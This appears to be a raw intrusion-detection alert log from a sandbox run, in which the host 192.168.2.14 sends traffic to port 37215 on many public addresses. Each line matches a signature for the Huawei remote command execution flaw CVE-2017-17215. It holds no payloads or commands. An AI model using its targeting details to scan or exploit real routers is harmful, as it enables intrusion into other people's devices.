                                                    07/10/24-08:26:51.987435TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3640237215192.168.2.14126.74.88.7
                                                    07/10/24-08:27:17.088897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4325237215192.168.2.14197.141.232.248
                                                    07/10/24-08:27:23.952903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5818037215192.168.2.14197.255.14.163
                                                    07/10/24-08:27:31.530342TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4841437215192.168.2.14157.183.247.164
                                                    07/10/24-08:26:20.137377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4594237215192.168.2.14197.232.142.234
                                                    07/10/24-08:26:20.186875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4834637215192.168.2.14207.97.201.53
                                                    07/10/24-08:26:28.761940TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5741037215192.168.2.14157.18.26.90
                                                    07/10/24-08:26:41.571728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5346637215192.168.2.14157.219.189.191
                                                    07/10/24-08:27:08.350346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3931037215192.168.2.1441.24.54.9
                                                    07/10/24-08:27:27.092607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5239837215192.168.2.14157.86.156.68
                                                    07/10/24-08:26:59.728995TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4211437215192.168.2.1441.138.140.114
                                                    07/10/24-08:26:11.529924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6083237215192.168.2.14157.189.254.100
                                                    07/10/24-08:27:02.702658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6055237215192.168.2.14157.160.251.34
                                                    07/10/24-08:26:22.283182TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6064637215192.168.2.14157.23.0.167
                                                    07/10/24-08:26:33.210665TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5906637215192.168.2.14157.252.136.176
                                                    07/10/24-08:27:13.869109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5627437215192.168.2.1441.159.31.57
                                                    07/10/24-08:26:29.842120TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3787837215192.168.2.14197.107.246.114
                                                    07/10/24-08:27:07.361334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3322837215192.168.2.1496.142.145.152
                                                    07/10/24-08:26:51.994247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3417437215192.168.2.14197.130.70.229
                                                    07/10/24-08:26:59.781725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4855037215192.168.2.14157.90.178.164
                                                    07/10/24-08:27:10.655556TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3953437215192.168.2.14197.191.40.61
                                                    07/10/24-08:26:43.667979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4669637215192.168.2.14108.198.118.170
                                                    07/10/24-08:27:17.055063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4031437215192.168.2.14171.103.187.3
                                                    07/10/24-08:26:28.912225TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3486637215192.168.2.1497.161.45.53
                                                    07/10/24-08:27:02.702209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5427637215192.168.2.1441.64.224.30
                                                    07/10/24-08:26:36.343615TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4732637215192.168.2.1486.198.150.199
                                                    07/10/24-08:26:45.659206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5643437215192.168.2.14157.225.114.65
                                                    07/10/24-08:26:49.910333TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4734637215192.168.2.1441.3.111.199
                                                    07/10/24-08:27:30.400468TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3295637215192.168.2.14157.158.188.95
                                                    07/10/24-08:26:59.844972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4344637215192.168.2.1441.250.156.182
                                                    07/10/24-08:27:32.610911TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5153237215192.168.2.1441.144.235.152
                                                    07/10/24-08:26:43.878190TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4315837215192.168.2.14197.176.243.98
                                                    07/10/24-08:26:26.483995TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5568237215192.168.2.14124.78.19.161
                                                    07/10/24-08:26:57.564039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4505437215192.168.2.1441.138.225.158
                                                    07/10/24-08:27:10.652052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3341437215192.168.2.14197.140.188.104
                                                    07/10/24-08:27:14.889190TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4368637215192.168.2.1420.183.86.84
                                                    07/10/24-08:26:13.755859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4351437215192.168.2.14157.223.56.115
                                                    07/10/24-08:27:19.315595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4377237215192.168.2.1441.189.51.31
                                                    07/10/24-08:26:57.654804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5597037215192.168.2.14218.132.74.249
                                                    07/10/24-08:26:22.297520TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3362637215192.168.2.14157.103.58.170
                                                    07/10/24-08:27:14.861603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3398037215192.168.2.1447.90.25.215
                                                    07/10/24-08:26:31.083283TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5045837215192.168.2.14180.139.78.143
                                                    07/10/24-08:27:23.452507TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5676637215192.168.2.1441.33.103.84
                                                    07/10/24-08:27:08.335280TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4784637215192.168.2.14204.156.95.105
                                                    07/10/24-08:27:17.071296TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5077837215192.168.2.1432.148.188.83
                                                    07/10/24-08:26:43.597937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3357837215192.168.2.14191.143.25.50
                                                    07/10/24-08:26:11.136124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3691237215192.168.2.14197.211.212.8
                                                    07/10/24-08:26:11.583025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4438037215192.168.2.1441.88.93.143
                                                    07/10/24-08:26:43.839334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5318237215192.168.2.14208.207.110.198
                                                    07/10/24-08:26:47.918271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3543037215192.168.2.14107.64.60.36
                                                    07/10/24-08:27:07.301453TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5837837215192.168.2.14157.99.247.1
                                                    07/10/24-08:27:34.118547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4172037215192.168.2.14157.37.98.156
                                                    07/10/24-08:26:28.798195TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4371837215192.168.2.14157.79.175.89
                                                    07/10/24-08:26:43.772841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3719037215192.168.2.14197.184.237.105
                                                    07/10/24-08:27:31.441274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3491437215192.168.2.1441.168.30.79
                                                    07/10/24-08:26:22.288266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4996637215192.168.2.1441.242.83.216
                                                    07/10/24-08:26:59.657792TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5679837215192.168.2.14197.232.50.165
                                                    07/10/24-08:27:28.064051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4088437215192.168.2.1441.115.141.65
                                                    07/10/24-08:26:13.720091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3321437215192.168.2.14197.117.175.135
                                                    07/10/24-08:26:14.624434TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4342237215192.168.2.14218.157.32.170
                                                    07/10/24-08:26:55.432680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4537037215192.168.2.1441.87.33.135
                                                    07/10/24-08:26:13.831960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4249837215192.168.2.14157.75.247.179
                                                    07/10/24-08:26:41.617966TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3686637215192.168.2.14197.23.22.195
                                                    07/10/24-08:26:47.941527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5364237215192.168.2.14171.210.182.24
                                                    07/10/24-08:27:28.121726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5867437215192.168.2.1441.24.132.124
                                                    07/10/24-08:26:42.461538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4372837215192.168.2.14197.22.89.233
                                                    07/10/24-08:26:26.554327TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5414237215192.168.2.14197.91.178.144
                                                    07/10/24-08:26:29.766874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5772837215192.168.2.14197.194.209.54
                                                    07/10/24-08:26:29.842424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3559637215192.168.2.14197.198.149.8
                                                    07/10/24-08:27:27.084495TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5490437215192.168.2.14197.11.86.58
                                                    07/10/24-08:27:31.555849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5648037215192.168.2.14197.70.229.92
                                                    07/10/24-08:26:28.840131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3697437215192.168.2.14200.65.12.234
                                                    07/10/24-08:27:05.090396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4942837215192.168.2.14157.172.129.128
                                                    07/10/24-08:26:49.861410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6037237215192.168.2.14157.78.177.53
                                                    07/10/24-08:26:55.418151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5533637215192.168.2.14157.218.224.161
                                                    07/10/24-08:27:27.114330TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3828837215192.168.2.14124.180.248.95
                                                    07/10/24-08:26:11.575874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5690437215192.168.2.1441.228.20.71
                                                    07/10/24-08:26:15.876739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5697837215192.168.2.14157.48.246.75
                                                    07/10/24-08:27:23.921577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5334437215192.168.2.14157.107.190.19
                                                    07/10/24-08:26:34.220908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4730837215192.168.2.14216.80.244.192
                                                    07/10/24-08:26:36.322719TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5756237215192.168.2.14197.248.101.242
                                                    07/10/24-08:27:22.861640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5091237215192.168.2.14197.78.148.158
                                                    07/10/24-08:26:52.017294TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5033037215192.168.2.14197.22.177.116
                                                    07/10/24-08:27:05.092511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6092237215192.168.2.1441.225.173.129
                                                    07/10/24-08:27:23.792966TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5987637215192.168.2.1441.200.72.109
                                                    07/10/24-08:26:25.520266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3475437215192.168.2.14197.240.153.238
                                                    07/10/24-08:26:38.638682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5253237215192.168.2.14157.91.121.230
                                                    07/10/24-08:27:13.985785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4293837215192.168.2.1441.134.176.67
                                                    07/10/24-08:27:24.959708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5199837215192.168.2.1441.124.238.95
                                                    07/10/24-08:26:15.874379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4552037215192.168.2.1441.113.245.177
                                                    07/10/24-08:27:27.128635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6085437215192.168.2.1494.69.187.107
                                                    07/10/24-08:26:13.850182TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4180837215192.168.2.14197.106.236.18
                                                    07/10/24-08:27:27.147425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4205637215192.168.2.14206.83.152.44
                                                    07/10/24-08:26:13.652301TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5054037215192.168.2.1441.42.255.166
                                                    07/10/24-08:26:13.778157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5209037215192.168.2.14157.43.50.8
                                                    07/10/24-08:26:15.849437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5649037215192.168.2.1441.177.164.54
                                                    07/10/24-08:26:28.923513TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4786437215192.168.2.1441.113.86.186
                                                    07/10/24-08:27:02.776815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4403237215192.168.2.14167.253.190.99
                                                    07/10/24-08:26:55.302705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4215637215192.168.2.1453.173.159.114
                                                    07/10/24-08:27:10.632992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5686437215192.168.2.1441.43.151.132
                                                    07/10/24-08:27:20.515408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4840037215192.168.2.1441.175.9.164
                                                    07/10/24-08:26:14.626418TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5335837215192.168.2.1441.186.143.177
                                                    07/10/24-08:26:17.976557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4053037215192.168.2.14197.89.238.78
                                                    07/10/24-08:26:20.192281TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3884837215192.168.2.1441.107.194.44
                                                    07/10/24-08:27:24.913087TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5611037215192.168.2.14197.22.206.251
                                                    07/10/24-08:26:34.202638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4849837215192.168.2.14165.145.162.124
                                                    07/10/24-08:26:42.352780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5374837215192.168.2.14157.234.81.50
                                                    07/10/24-08:26:20.127957TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3726037215192.168.2.14119.197.173.100
                                                    07/10/24-08:26:47.990859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5773037215192.168.2.1441.205.144.27
                                                    07/10/24-08:26:15.856531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4201037215192.168.2.14156.97.59.168
                                                    07/10/24-08:26:42.381033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5783637215192.168.2.1493.109.26.132
                                                    07/10/24-08:27:28.085115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5656837215192.168.2.14157.248.33.110
                                                    07/10/24-08:26:43.551823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4898037215192.168.2.1441.50.211.217
                                                    07/10/24-08:27:22.540991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3719837215192.168.2.14157.21.58.63
                                                    07/10/24-08:26:18.001692TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5665437215192.168.2.1441.210.199.97
                                                    07/10/24-08:27:20.451550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5802637215192.168.2.14157.16.163.172
                                                    07/10/24-08:26:11.205832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3575237215192.168.2.1496.209.118.195
                                                    07/10/24-08:26:20.140373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3854237215192.168.2.14197.32.131.149
                                                    07/10/24-08:26:28.809253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4716237215192.168.2.14137.249.168.230
                                                    07/10/24-08:27:11.555900TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4761037215192.168.2.1441.109.138.95
                                                    07/10/24-08:26:25.438219TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5377037215192.168.2.14197.252.172.6
                                                    07/10/24-08:26:38.630807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3330637215192.168.2.14197.120.11.182
                                                    07/10/24-08:26:25.484683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3557437215192.168.2.14157.83.22.27
                                                    07/10/24-08:27:13.967608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3796237215192.168.2.14197.164.221.133
                                                    07/10/24-08:26:33.268037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4397437215192.168.2.14157.34.132.63
                                                    07/10/24-08:26:55.366242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3892237215192.168.2.14199.179.57.142
                                                    07/10/24-08:26:38.596556TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3839437215192.168.2.14157.249.13.225
                                                    07/10/24-08:27:33.856159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4909037215192.168.2.14157.202.57.33
                                                    07/10/24-08:27:22.903866TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4033637215192.168.2.14157.161.173.202
                                                    07/10/24-08:27:20.420210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5419237215192.168.2.14197.95.196.1
                                                    07/10/24-08:26:33.245667TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4425837215192.168.2.1441.52.29.15
                                                    07/10/24-08:27:36.290826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5548237215192.168.2.1494.221.214.215
                                                    07/10/24-08:26:42.413820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5120637215192.168.2.14157.134.102.159
                                                    07/10/24-08:27:08.450568TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3649237215192.168.2.1441.168.210.18
                                                    07/10/24-08:27:08.397660TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4664837215192.168.2.1441.87.123.199
                                                    07/10/24-08:26:22.294435TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3854837215192.168.2.14157.67.196.153
                                                    07/10/24-08:26:59.580773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3892437215192.168.2.1441.196.238.95
                                                    07/10/24-08:26:29.839757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3937037215192.168.2.1441.243.115.128
                                                    07/10/24-08:26:52.060029TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5696037215192.168.2.14197.87.0.232
                                                    07/10/24-08:27:02.702114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4639637215192.168.2.1441.142.200.12
                                                    07/10/24-08:26:41.343465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4353437215192.168.2.14197.185.230.144
                                                    07/10/24-08:26:13.766150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5257637215192.168.2.14197.126.237.60
                                                    07/10/24-08:26:22.240891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5657637215192.168.2.1441.186.216.48
                                                    07/10/24-08:26:59.877508TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5907837215192.168.2.1441.113.155.85
                                                    07/10/24-08:27:02.692447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4150637215192.168.2.1441.61.26.153
                                                    07/10/24-08:26:25.453697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4364437215192.168.2.14197.14.95.189
                                                    07/10/24-08:27:20.514336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4160837215192.168.2.14197.100.201.248
                                                    07/10/24-08:26:17.968756TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5191637215192.168.2.14197.127.254.137
                                                    07/10/24-08:26:29.876812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4947437215192.168.2.14157.90.38.9
                                                    07/10/24-08:27:08.318439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4552037215192.168.2.14197.86.103.20
                                                    07/10/24-08:26:42.376307TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6034237215192.168.2.14157.22.238.183
                                                    07/10/24-08:27:34.136895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4751037215192.168.2.14197.63.183.227
                                                    07/10/24-08:27:32.606203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3394437215192.168.2.1441.151.167.98
                                                    07/10/24-08:27:28.148356TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3480037215192.168.2.14197.115.211.165
                                                    07/10/24-08:27:31.435309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5388637215192.168.2.1441.134.172.147
                                                    07/10/24-08:26:22.259502TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3600437215192.168.2.14197.139.183.85
                                                    07/10/24-08:26:55.421781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4355437215192.168.2.14197.20.9.72
                                                    07/10/24-08:26:57.522324TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5365037215192.168.2.14157.41.242.89
                                                    07/10/24-08:26:59.847925TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5433437215192.168.2.1448.11.87.246
                                                    07/10/24-08:26:38.614287TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5287237215192.168.2.14157.189.124.68
                                                    07/10/24-08:27:11.569175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5437637215192.168.2.14197.172.105.218
                                                    07/10/24-08:27:13.848645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5283237215192.168.2.1441.222.229.225
                                                    07/10/24-08:26:22.213907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5343837215192.168.2.14157.165.91.139
                                                    07/10/24-08:27:33.681754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3644437215192.168.2.1441.152.159.245
                                                    07/10/24-08:26:14.819807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3973637215192.168.2.14197.135.88.181
                                                    07/10/24-08:27:02.931527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3781237215192.168.2.14157.184.17.209
                                                    07/10/24-08:26:57.654674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3292437215192.168.2.1441.40.80.54
                                                    07/10/24-08:26:11.664680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5463837215192.168.2.1441.181.29.82
                                                    07/10/24-08:27:10.613863TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3377237215192.168.2.14197.88.39.244
                                                    07/10/24-08:26:29.847797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5102037215192.168.2.14197.252.90.189
                                                    07/10/24-08:26:36.372114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3518437215192.168.2.14157.31.49.26
                                                    07/10/24-08:26:15.867590TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5264437215192.168.2.14157.254.230.157
                                                    07/10/24-08:27:32.538394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3980037215192.168.2.14157.208.173.231
                                                    07/10/24-08:26:41.587846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3623637215192.168.2.14197.111.100.87
                                                    07/10/24-08:27:23.786219TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4310037215192.168.2.14216.155.138.124
                                                    07/10/24-08:27:08.458105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3860637215192.168.2.14197.3.158.1
                                                    07/10/24-08:26:28.647511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5453237215192.168.2.14148.165.128.242
                                                    07/10/24-08:27:20.418870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5881437215192.168.2.1441.57.236.8
                                                    07/10/24-08:27:17.107350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5681837215192.168.2.14197.155.80.247
                                                    07/10/24-08:26:22.260584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4668237215192.168.2.1441.16.20.87
                                                    07/10/24-08:26:33.257130TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3409437215192.168.2.14134.172.34.250
                                                    07/10/24-08:26:55.392716TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4832837215192.168.2.14197.138.73.22
                                                    07/10/24-08:26:26.591213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5060037215192.168.2.14197.131.78.88
                                                    07/10/24-08:27:17.057474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3959237215192.168.2.14197.253.143.72
                                                    07/10/24-08:27:19.309217TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3759237215192.168.2.14197.255.184.32
                                                    07/10/24-08:27:28.082325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4419237215192.168.2.14197.57.168.190
                                                    07/10/24-08:26:57.514091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4688237215192.168.2.14197.188.121.55
